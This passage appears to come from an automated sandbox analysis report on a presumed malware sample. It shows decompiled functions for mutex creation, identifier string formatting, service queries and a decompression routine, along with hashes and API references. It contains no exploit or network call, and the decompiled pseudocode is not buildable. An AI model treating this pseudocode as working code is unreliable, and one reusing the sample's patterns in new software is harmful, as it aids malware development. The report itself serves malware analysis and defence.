CreateMutexW.KERNEL32(00000000,00000001,?), ref: 0011117D

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$CreateFreeMutexProcess_snwprintf
String ID:
API String ID: 3932063178-0
Opcode ID: e4eaaa35f64c17f281a7698beef3dfb4b4d0fcd0414b1d15d9a0ea2a440c6ba0
Instruction ID: ecd05ff05915a9688cf3342f70491ba3de89cb9a0701833638cce516463ca84b
Opcode Fuzzy Hash: e4eaaa35f64c17f281a7698beef3dfb4b4d0fcd0414b1d15d9a0ea2a440c6ba0
Instruction Fuzzy Hash: F8F0EC72701209BBDB2017D56C4EBDE7719EB44353F0000B1F70DD5581D97285A58B91

Uniqueness

Uniqueness Score: 3.75%

Function 00116878, Relevance: 6.0, APIs: 4, Instructions: 31
memoryCOMMON

C-Code - Quality: 47%

			E00116878(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t17;
				void* _t18;
				void* _t28;
				void* _t30;
				void* _t32;

				_t30 = __esi;
				_t18 = __ebx;
				asm("popfd");
				asm("int3");
				_t28 = L00111D00(__ecx, __edx, __edi);
				_t12 =  *0x1259dc(_t18, _t30, _t28, GetTickCount() % 0xffff);
				HeapFree(GetProcessHeap(), 0, _t28);
				_push(_t18 + _t12 * 2);
				L00111850( *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)))),  *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)) + 4)));
				_t17 = _t18;
				goto 0x301578;
				return _t17;
			}

0x00116878
0x00116878
0x00116878
0x00116879
0x00116882
0x00116897
0x001168ac
0x001168b8
0x001168be
0x001168c6
0x001168c9
0x001168ce

APIs

GetTickCount.KERNEL32 ref: 00116884
_snwprintf.NTDLL ref: 00116897
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001168A5
HeapFree.KERNEL32(00000000), ref: 001168AC

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$CountFreeProcessTick_snwprintf
String ID:
API String ID: 3064400467-0
Opcode ID: 937062585e339777627a607f58a98ad7b855929d26ec86d8faee5882d3ec32f4
Instruction ID: c8ef84addd0504332d6492684b65cce79a8775658c1b12ae7c8495fb75a7e598
Opcode Fuzzy Hash: 937062585e339777627a607f58a98ad7b855929d26ec86d8faee5882d3ec32f4
Instruction Fuzzy Hash: 34F0A7B1A00500BFE7149760EC8D93B366AEFC5345B144078F50B8B691E9319C56C791

Uniqueness

Uniqueness Score: 4.01%

Function 0011F9BC, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 21
memoryCOMMON

C-Code - Quality: 27%

			E0011F9BC(void* __esi) {
				void* _t2;
				void* _t7;
				void* _t8;
				void* _t10;
				void* _t12;

				asm("popfd");
				asm("int3");
				_t2 = L00111C60(_t7, _t8, __esi);
				_t10 = _t2;
				 *0x125858("536720_3C4E0000", 0x104, _t10, _t12 - 0x14,  *0x126d58);
				return HeapFree(GetProcessHeap(), 0, _t10);
			}

0x0011f9bc
0x0011f9bd
0x0011f9be
0x0011f9c9
0x0011f9da
0x0011f9f7

APIs

_snprintf.NTDLL ref: 0011F9DA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F9E6
HeapFree.KERNEL32(00000000), ref: 0011F9ED

Strings

536720_3C4E0000, xrefs: 0011F9D5

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess_snprintf
String ID: 536720_3C4E0000
API String ID: 2005195844-3522288767
Opcode ID: 699c6a7d98b5421e3d5ecea71ef14b58b120bd62090be9463376624b9b9d5953
Instruction ID: 22e0223df2061696e30e6bfa6309f3c8cd5f7d289ead294dd9734ba8672359fd
Opcode Fuzzy Hash: 699c6a7d98b5421e3d5ecea71ef14b58b120bd62090be9463376624b9b9d5953
Instruction Fuzzy Hash: CAD0C231580218BBC32067D57C4ABEB3B28DB04327F000041FA49A1991DAB104B087E2

Uniqueness

Uniqueness Score: 16.53%

Function 0011FB0F, Relevance: 6.0, APIs: 4, Instructions: 16memoryserviceCOMMON

APIs

OpenServiceW.ADVAPI32(?,?,00000001), ref: 0011FABF
QueryServiceConfig2W.ADVAPI32 ref: 0011FB0F
GetProcessHeap.KERNEL32(00000000,?), ref: 0011FB1F
HeapFree.KERNEL32(00000000), ref: 0011FB26
CloseServiceHandle.ADVAPI32 ref: 0011FB2D

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Service$Heap$CloseConfig2FreeHandleOpenProcessQuery
String ID:
API String ID: 1527468304-0
Opcode ID: 126a939802ea6fc9cd86d8de5db0942196b3a8111b0c8df4ecfb1bb5ab9c7e72
Instruction ID: b57efc938e98bbf9c523caa2509de5f3dc9551d55b4b41cbf0e05999229a222c
Opcode Fuzzy Hash: 126a939802ea6fc9cd86d8de5db0942196b3a8111b0c8df4ecfb1bb5ab9c7e72
Instruction Fuzzy Hash: B9D017BA440A00EBCB229BF49D4C96E7A3AAB4C3123160414E80AA3A11DB3588A29B14

Uniqueness

Uniqueness Score: 0.09%

Function 00115BD5, Relevance: 5.1, APIs: 4, Instructions: 82
COMMON

C-Code - Quality: 68%

			E00115BD5(void* __ebx, void __edi, signed int __esi) {
				signed int _t597;
				signed int _t599;
				void* _t600;
				signed int _t610;
				signed int* _t620;
				signed int _t623;
				signed int _t640;
				signed int _t642;
				signed int _t644;
				signed int _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t690;
				unsigned int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t699;
				signed int _t709;
				signed int _t714;
				signed int _t716;
				signed int _t719;
				signed int _t721;
				signed int _t722;
				intOrPtr _t734;
				intOrPtr _t735;
				intOrPtr _t736;
				signed int _t739;
				signed int _t743;
				void* _t749;
				signed int _t754;
				signed int _t756;
				signed int _t760;
				signed int _t764;
				signed int _t767;
				signed int _t771;
				void* _t776;
				signed int _t780;
				void* _t781;
				signed int _t786;
				void* _t787;
				void* _t788;
				signed int _t793;
				signed int _t794;
				void* _t796;
				signed int _t797;
				signed int _t804;
				signed int _t806;
				intOrPtr* _t808;
				void* _t809;
				signed int _t820;
				signed int _t822;
				intOrPtr _t824;
				signed char _t828;
				intOrPtr* _t830;
				void* _t831;
				signed int _t839;
				void* _t841;
				void* _t843;
				signed int _t845;
				intOrPtr _t846;
				signed int _t856;
				signed int _t859;
				void* _t860;
				void* _t861;
				void* _t862;
				void* _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				signed char _t868;
				signed char _t871;
				intOrPtr _t873;
				signed int _t876;
				void* _t877;
				signed char _t879;
				signed int _t880;
				signed int _t881;
				signed char _t886;
				signed int _t888;
				void* _t889;
				void* _t890;
				signed int _t893;
				signed char _t894;
				intOrPtr _t896;
				intOrPtr _t898;
				void* _t901;
				signed char _t902;
				signed char _t903;
				void _t904;
				signed int _t908;
				signed char _t913;
				void* _t914;
				void* _t915;
				signed int _t918;
				void* _t923;
				signed int _t927;
				signed char _t931;
				signed int _t932;
				signed char _t935;
				signed int _t936;
				void* _t944;
				signed int _t959;
				unsigned int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t969;
				signed int* _t970;
				signed char* _t975;
				void* _t976;
				void* _t981;
				signed int _t982;
				signed int _t983;
				signed int _t986;
				signed int _t987;
				signed int _t989;
				signed int _t991;
				signed int _t992;
				signed int _t995;
				signed int _t999;
				signed int _t1005;
				signed int _t1006;
				int _t1007;
				int _t1009;
				signed int _t1010;
				unsigned int _t1013;
				void* _t1017;
				intOrPtr _t1018;
				signed char _t1019;
				void _t1022;
				void* _t1024;
				signed int _t1025;
				void* _t1027;
				int _t1032;
				signed int _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1038;
				void* _t1040;
				signed int _t1042;
				signed int _t1043;
				unsigned int _t1045;
				signed int _t1046;
				unsigned int _t1048;
				signed int _t1049;
				signed char _t1057;
				void* _t1058;
				void* _t1060;
				void* _t1061;

				L0:
				while(1) {
					L0:
					_t1043 = __esi;
					_t1022 = __edi;
					_t841 = __ebx;
					_t596 = memset(__edi + 0x1b80, 0, ??);
					_t962 =  *(_t1058 - 4);
					_t1061 = _t1060 + 0xc;
					while(1) {
						L135:
						 *(_t1058 - 8) = _t893;
						__eflags = _t893 -  *((intOrPtr*)(_t1022 + 0x34));
						if(_t893 >=  *((intOrPtr*)(_t1022 + 0x34))) {
							break;
						}
						L136:
						__eflags = _t1043 - 3;
						if(_t1043 >= 3) {
							L139:
							_t927 = _t991 & 0x00000007;
							_t991 = _t991 >> 3;
							_t1043 = _t1043 - 3;
							 *(_t1058 - 4) = _t991;
							 *(_t1058 - 0x1c) = _t1043;
							_t596 =  *( *(_t1058 - 8) + 0x121a24) & 0x000000ff;
							 *(_t596 + _t1022 + 0x1b80) = _t927;
							_t893 =  *(_t1058 - 8) + 1;
							continue;
						} else {
							while(1) {
								L137:
								__eflags = _t841 -  *(_t1058 - 0x20);
								if(_t841 >=  *(_t1058 - 0x20)) {
									break;
								}
								L138:
								_t596 = ( *_t841 & 0x000000ff) << _t1043;
								_t841 = _t841 + 1;
								_t991 = _t991 | _t596;
								 *(_t1058 - 0x18) = _t841;
								_t1043 = _t1043 + 8;
								 *(_t1058 - 4) = _t991;
								__eflags = _t1043 - 3;
								if(_t1043 < 3) {
									continue;
								} else {
									goto L139;
								}
								goto L295;
							}
							L249:
							 *_t1022 = 0xe;
							L285:
							__eflags =  *(_t1058 + 0x18) & 0x00000002;
							L286:
							L287:
							_t597 =  !=  ? 1 : _t596;
							 *(_t1058 - 0xc) = _t597;
							__eflags = _t597 - 1;
							if(_t597 != 1) {
								L288:
								__eflags = _t597 - 0xfffffffc;
								if(_t597 != 0xfffffffc) {
									L289:
									L292:
									_t642 =  *(_t1058 - 0x3c);
									__eflags = _t841 - _t642;
									if(_t841 > _t642) {
										while(1) {
											L293:
											__eflags = _t1043 - 8;
											if(_t1043 < 8) {
												goto L295;
											}
											L294:
											_t841 = _t841 - 1;
											_t1043 = _t1043 - 8;
											__eflags = _t841 - _t642;
											if(_t841 > _t642) {
												continue;
											}
											goto L295;
										}
									}
								}
							}
						}
						L295:
						_t963 =  *(_t1058 - 4);
						L296:
						 *(_t1022 + 4) = _t1043;
						asm("bts ecx, esi");
						__eflags = _t1043 - 0x20;
						_t599 =  >=  ? 0 : 0;
						_t856 = 0 ^ _t599;
						__eflags = _t1043 - 0x40;
						_t600 =  >=  ? _t856 : _t599;
						 *(_t1022 + 0x20) =  *(_t1058 - 0x28);
						_t965 =  *(_t1058 - 0x10) -  *(_t1058 + 0x10);
						__eflags =  *(_t1058 + 0x18) & 0x00000009;
						 *(_t1022 + 0x24) =  *(_t1058 - 8);
						 *(_t1022 + 0x28) =  *(_t1058 - 0x38);
						 *((intOrPtr*)(_t1022 + 0x3c)) =  *((intOrPtr*)(_t1058 - 0x48));
						 *(_t1022 + 0x38) = _t856 - 0x00000001 & _t963;
						 *(_t1058 - 0x10) = _t965;
						 *((intOrPtr*)( *((intOrPtr*)(_t1058 + 8)))) = _t841 -  *(_t1058 - 0x3c);
						_t843 =  *(_t1058 - 0xc);
						 *( *(_t1058 + 0x14)) = _t965;
						if(( *(_t1058 + 0x18) & 0x00000009) != 0) {
							L297:
							__eflags = _t843;
							if(_t843 >= 0) {
								L298:
								_t1045 =  *(_t1022 + 0x1c);
								_t859 = _t1045 & 0x0000ffff;
								_t610 = (0x5e6ea9af * _t965 >> 0x20 >> 0xb) * 0x15b0;
								_t1046 = _t1045 >> 0x10;
								 *(_t1058 - 0x3c) = _t1046;
								_t969 =  *(_t1058 - 0x10) - _t610;
								__eflags =  *(_t1058 - 0x10);
								 *(_t1058 - 0x34) = _t969;
								if( *(_t1058 - 0x10) != 0) {
									L299:
									_t845 = _t969;
									do {
										L300:
										_t970 = 0;
										 *(_t1058 + 0x14) = 0;
										__eflags = _t845 - 7;
										if(_t845 > 7) {
											L301:
											goto 0x30149d;
											asm("int3");
											asm("int3");
											asm("int3");
											L302:
											_t1024 = _t1022 - _t610;
											__eflags = _t1024;
											do {
												L303:
												_t970 =  &(_t970[2]);
												_t861 = _t859 + ( *_t610 & 0x000000ff);
												_t862 = _t861 + ( *( *(_t1058 + 0x10) + 1) & 0x000000ff);
												_t863 = _t862 + ( *( *(_t1058 + 0x10) + 2) & 0x000000ff);
												_t864 = _t863 + ( *( *(_t1058 + 0x10) + 3) & 0x000000ff);
												_t865 = _t864 + ( *( *(_t1058 + 0x10) + 4) & 0x000000ff);
												_t866 = _t865 + ( *( *(_t1058 + 0x10) + 5) & 0x000000ff);
												_t867 = _t866 + ( *( *(_t1058 + 0x10) + 6) & 0x000000ff);
												_t859 = _t867 + ( *( *(_t1058 + 0x10) + 7) & 0x000000ff);
												_t640 =  *(_t1058 + 0x10) + 8;
												_t1046 = _t1046 + _t861 + _t862 + _t863 + _t864 + _t865 + _t866 + _t867 + _t859;
												 *(_t1058 + 0x10) = _t640;
												__eflags = _t1024 + _t640 - _t845;
												_t610 =  *(_t1058 + 0x10);
											} while (_t1024 + _t640 < _t845);
											 *(_t1058 + 0x14) = _t970;
											 *(_t1058 - 0x3c) = _t1046;
										}
										L305:
										_t1022 = 0;
										 *((intOrPtr*)(_t1058 + 8)) = 0;
										__eflags = _t970 - _t845;
										if(_t970 < _t845) {
											L306:
											__eflags = _t845 - _t970 - 2;
											if(_t845 - _t970 >= 2) {
												L307:
												_t620 =  *(_t1058 + 0x14);
												_t1049 =  *(_t1058 + 0x10);
												_t846 = 0;
												_t981 = (_t845 - _t620 - 2 >> 1) + 1;
												__eflags = _t981;
												 *(_t1058 + 0x14) = _t620 + _t981 * 2;
												do {
													L308:
													_t860 = _t859 + ( *_t1049 & 0x000000ff);
													_t623 =  *(_t1049 + 1) & 0x000000ff;
													_t1022 = _t1022 + _t860;
													_t1049 = _t1049 + 2;
													_t859 = _t860 + _t623;
													_t846 = _t846 + _t859;
													_t981 = _t981 - 1;
													__eflags = _t981;
												} while (_t981 != 0);
												_t970 =  *(_t1058 + 0x14);
												 *(_t1058 + 0x10) = _t1049;
												_t1046 =  *(_t1058 - 0x3c);
												 *((intOrPtr*)(_t1058 + 8)) = _t846;
												_t845 =  *(_t1058 - 0x34);
											}
											L310:
											__eflags = _t970 - _t845;
											if(_t970 < _t845) {
												_t975 =  *(_t1058 + 0x10);
												_t859 = _t859 + ( *_t975 & 0x000000ff);
												_t1046 = _t1046 + _t859;
												_t976 =  &(_t975[1]);
												__eflags = _t976;
												 *(_t1058 + 0x10) = _t976;
											}
											L312:
											_t610 =  *((intOrPtr*)(_t1058 + 8)) + _t1022;
											_t1046 = _t1046 + _t610;
											__eflags = _t1046;
										}
										L313:
										L314:
										_t859 = _t859 + (_t610 * _t859 >> 0x20 >> 0xf) * 0xffff000f;
										_t610 = (0x80078071 * _t1046 >> 0x20 >> 0xf) * 0xffff000f;
										_t1046 = _t1046 + _t610;
										_t586 = _t1058 - 0x10;
										 *_t586 =  *(_t1058 - 0x10) - _t845;
										__eflags =  *_t586;
										_t845 = 0x15b0;
										 *(_t1058 - 0x3c) = _t1046;
										 *(_t1058 - 0x34) = 0x15b0;
									} while ( *_t586 != 0);
									goto 0x3014c6;
									asm("int3");
								}
								L316:
								_t1048 = (_t1046 << 0x10) + _t859;
								 *(_t1022 + 0x1c) = _t1048;
								__eflags = _t843;
								if(_t843 == 0) {
									__eflags =  *(_t1058 + 0x18) & 0x00000001;
									if(( *(_t1058 + 0x18) & 0x00000001) != 0) {
										__eflags = _t1048 -  *(_t1022 + 0x10);
										_t843 =  !=  ? 0xfffffffe : _t843;
									}
								}
							}
						}
						L319:
						return _t843;
						L320:
					}
					L140:
					 *((intOrPtr*)(_t1022 + 0x34)) = 0x13;
					while(1) {
						L141:
						_t694 =  *(_t1022 + 0x18);
						__eflags = _t694;
						if(_t694 >= 0) {
							break;
						}
						L218:
						_t982 =  *(_t1058 - 4);
						while(1) {
							L39:
							_t879 =  *(_t1058 - 0x20) - _t841;
							__eflags = _t879 - 4;
							if(_t879 < 4) {
								goto L58;
							}
							L40:
							_t1022 =  *(_t1058 - 0x14);
							__eflags =  *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) - 2;
							if( *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1043 - 0xf;
								if(_t1043 < 0xf) {
									_t995 =  *(_t841 + 1) & 0x000000ff;
									_t879 = _t1043;
									_t722 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | (_t995 << 0x00000008 | _t722) << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
								}
								_t596 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t596;
								__eflags = _t596;
								if(_t596 < 0) {
									L45:
									goto 0x301333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t709 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t709 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L44:
									_t879 = _t596 >> 9;
								}
								L48:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 & 0x00000100;
								if((_t880 & 0x00000100) != 0) {
									L84:
									_t881 = _t880 & 0x000001ff;
									 *(_t1058 - 8) = _t881;
									__eflags = _t881 - 0x100;
									if(_t881 != 0x100) {
										L219:
										_t673 = _t881 * 4 - 0x404;
										_t868 =  *(_t673 + 0x121010);
										_t596 =  *(_t673 + 0x121a48);
										 *(_t1058 - 0x38) = _t868;
										 *(_t1058 - 8) = _t596;
										__eflags = _t868;
										if(_t868 == 0) {
											L225:
											__eflags = _t1043 - 0xf;
											if(_t1043 >= 0xf) {
												L3:
												_t655 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
												 *(_t1058 - 0x1c) = _t655;
												if(_t655 < 0) {
													L5:
													goto 0x3012ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t657 = _t962 >> _t868;
														_t868 = _t868 + 1;
														_t841 =  *((short*)(_t1022 + 0x1700 + ((_t657 & 0x00000001) +  !_t841) * 2));
														__eflags = _t841;
													} while (_t841 < 0);
													 *(_t1058 - 0x1c) = _t841;
													_t841 =  *(_t1058 - 0x18);
													_t660 =  *(_t1058 - 0x1c);
												} else {
													L4:
													_t868 = _t655 >> 9;
													_t660 = _t655 & 0x000001ff;
												}
												L9:
												_t982 = _t962 >> _t868;
												_t1043 = _t1043 - _t868;
												_t871 =  *(0x121090 + _t660 * 4);
												_t596 =  *(0x121110 + _t660 * 4);
												 *(_t1058 - 4) = _t982;
												 *(_t1058 - 0x38) = _t871;
												 *(_t1058 - 0x28) = _t596;
												if(_t871 == 0) {
													L15:
													_t873 =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 + 0xc));
													 *((intOrPtr*)(_t1058 - 0x48)) = _t873;
													if(_t596 <= _t873 || ( *(_t1058 + 0x18) & 0x00000004) == 0) {
														L17:
														_t1022 =  *(_t1058 - 0x14);
														_t876 = (_t873 - _t596 &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc));
														 *(_t1058 - 0xc) = _t876;
														_t662 =  >  ?  *(_t1058 - 0x10) : _t876;
														_t877 =  *(_t1058 - 8);
														_t663 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877;
														_t1075 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877 -  *((intOrPtr*)(_t1058 - 0x40));
														if(( >  ?  *(_t1058 - 0x10) : _t876) + _t877 <=  *((intOrPtr*)(_t1058 - 0x40))) {
															L21:
															__eflags = _t877 - 9;
															if(_t877 < 9) {
																L30:
																goto 0x3012f7;
																asm("int3");
																do {
																	L32:
																	_t877 = _t877 - 3;
																	 *_t1022 =  *_t982 & 0x000000ff;
																	 *((char*)(_t1022 + 1)) =  *(_t982 + 1) & 0x000000ff;
																	_t666 =  *(_t982 + 2) & 0x000000ff;
																	_t982 = _t982 + 3;
																	 *(_t1022 + 2) = _t666;
																	_t1022 = _t1022 + 3;
																	__eflags = _t877 - 2;
																} while (_t877 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t877 -  *(_t1058 - 0x28);
																if(_t877 >  *(_t1058 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1042 =  *(_t1058 - 0xc);
																	_t959 =  *(_t1058 - 0x10);
																	_t828 = (_t877 & 0xfffffff8) + _t1042;
																	 *(_t1058 - 0x24) = _t828;
																	_t1019 = _t828;
																	do {
																		L24:
																		 *_t959 =  *_t1042;
																		_t830 =  *((intOrPtr*)(_t1042 + 4));
																		_t1042 = _t1042 + 8;
																		 *((intOrPtr*)(_t959 + 4)) = _t830;
																		_t959 = _t959 + 8;
																		__eflags = _t1042 - _t1019;
																	} while (_t1042 < _t1019);
																	_t982 =  *(_t1058 - 4);
																	 *(_t1058 - 0x10) = _t959;
																	_t877 =  *(_t1058 - 8) & 0x00000007;
																	 *(_t1058 - 0xc) = _t1042;
																	_t1022 =  *(_t1058 - 0x14);
																	 *(_t1058 - 8) = _t877;
																	__eflags = _t877 - 3;
																	if(_t877 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t831 = _t877;
																_t877 = _t877 - 1;
																 *(_t1058 - 8) = _t877;
																if(_t831 == 0) {
																	goto L39;
																}
																L19:
																if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																	L238:
																	 *(_t1058 - 0xc) = 2;
																	 *_t1022 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																	 *((intOrPtr*)(_t1058 - 0x48)) =  *((intOrPtr*)(_t1058 - 0x48)) + 1;
																	 *( *(_t1058 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1058 - 0x48)) -  *(_t1058 - 0x28) &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc))));
																	_t982 =  *(_t1058 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t879 =  *(_t1058 - 0x20) - _t841;
																__eflags = _t879 - 4;
																if(_t879 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L270:
														_t684 = _t596 | 0xffffffff;
														 *_t1022 = 0x25;
														goto L291;
													}
												} else {
													L10:
													if(_t1043 >= _t871) {
														L13:
														_t1043 = _t1043 - _t871;
														_t839 = (_t596 << _t871) - 0x00000001 & _t982;
														_t982 = _t982 >> _t871;
														 *(_t1058 - 0x28) =  *(_t1058 - 0x28) + _t839;
														_t596 =  *(_t1058 - 0x28);
														 *(_t1058 - 4) = _t982;
														goto L15;
													} else {
														L11:
														while(_t841 <  *(_t1058 - 0x20)) {
															_t596 = ( *_t841 & 0x000000ff) << _t1043;
															_t841 = _t841 + 1;
															_t871 =  *(_t1058 - 0x38);
															_t982 = _t982 | _t596;
															_t1043 = _t1043 + 8;
															 *(_t1058 - 0x18) = _t841;
															 *(_t1058 - 4) = _t982;
															if(_t1043 < _t871) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														 *_t1022 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1058 - 0x20) - _t841 - 2;
												if( *(_t1058 - 0x20) - _t841 >= 2) {
													L237:
													_t983 =  *(_t841 + 1) & 0x000000ff;
													_t676 =  *_t841 & 0x000000ff;
													_t841 = _t841 + 2;
													_t1022 =  *(_t1058 - 0x14);
													_t868 = _t1043;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) =  *(_t1058 - 4) | _t983 << _t1043 + 0x00000008 | _t676 << _t868;
													_t1043 = _t1043 + 0x10;
													_t962 =  *(_t1058 - 4);
												} else {
													do {
														L227:
														_t596 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
														 *(_t1058 - 0x24) = _t596;
														__eflags = _t596;
														if(_t596 < 0) {
															L231:
															__eflags = _t1043 - 0xa;
															if(_t1043 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1058 - 0x1c) = _t868;
																while(1) {
																	L234:
																	_t868 =  *((short*)(_t1022 + 0x1700 + ((_t962 >> _t868 & 0x00000001) +  !( *(_t1058 - 0x24))) * 2));
																	_t652 =  *(_t1058 - 0x1c) + 1;
																	 *(_t1058 - 0x24) = _t868;
																	 *(_t1058 - 0x1c) = _t652;
																	__eflags = _t868;
																	if(_t868 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t596 = _t652 + 1;
																	__eflags = _t1043 - _t596;
																	if(_t1043 < _t596) {
																		goto L1;
																	} else {
																		L236:
																		_t868 =  *(_t1058 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t596 = _t596 >> 9;
															__eflags = _t596;
															if(_t596 == 0) {
																L1:
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L264:
																	 *_t1022 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t868 = _t1043;
														_t644 = ( *_t841 & 0x000000ff) << _t868;
														_t841 = _t841 + 1;
														_t962 = _t962 | _t644;
														 *(_t1058 - 0x18) = _t841;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 4) = _t962;
													} while (_t1043 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1043 - _t868;
											if(_t1043 >= _t868) {
												L223:
												L224:
												_t1043 = _t1043 - _t868;
												_t680 = (_t596 << _t868) - 0x00000001 & _t962;
												_t962 = _t962 >> _t868;
												_t456 = _t1058 - 8;
												 *_t456 =  *(_t1058 - 8) + _t680;
												__eflags =  *_t456;
												 *(_t1058 - 4) = _t962;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L222:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t868 =  *(_t1058 - 0x38);
													_t962 = _t962 | _t596;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - _t868;
													if(_t1043 < _t868) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1022 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1022 + 0x14) & 0x00000001;
											if(( *(_t1022 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1043 - 3;
											if(_t1043 >= 3) {
												L89:
												_t1043 = _t1043 - 3;
												_t693 = _t962 & 0x00000007;
												_t991 = _t962 >> 3;
												 *(_t1022 + 0x14) = _t693;
												_t596 = _t693 >> 1;
												__eflags = _t596;
												 *(_t1058 - 4) = _t991;
												 *(_t1058 - 0x1c) = _t1043;
												 *(_t1022 + 0x18) = _t596;
												if(_t596 != 0) {
													L124:
													__eflags = _t596 - 3;
													if(_t596 == 3) {
														L266:
														 *(_t1058 - 0xc) = 0xffffffff;
														 *_t1022 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t596 - 1;
														if(_t596 != 1) {
															L128:
															_t893 = 0;
															__eflags = 0;
															while(1) {
																L129:
																 *(_t1058 - 8) = _t893;
																__eflags = _t893 - 3;
																if(_t893 >= 3) {
																	break;
																}
																L130:
																_t596 =  *((char*)(_t893 + 0x121004));
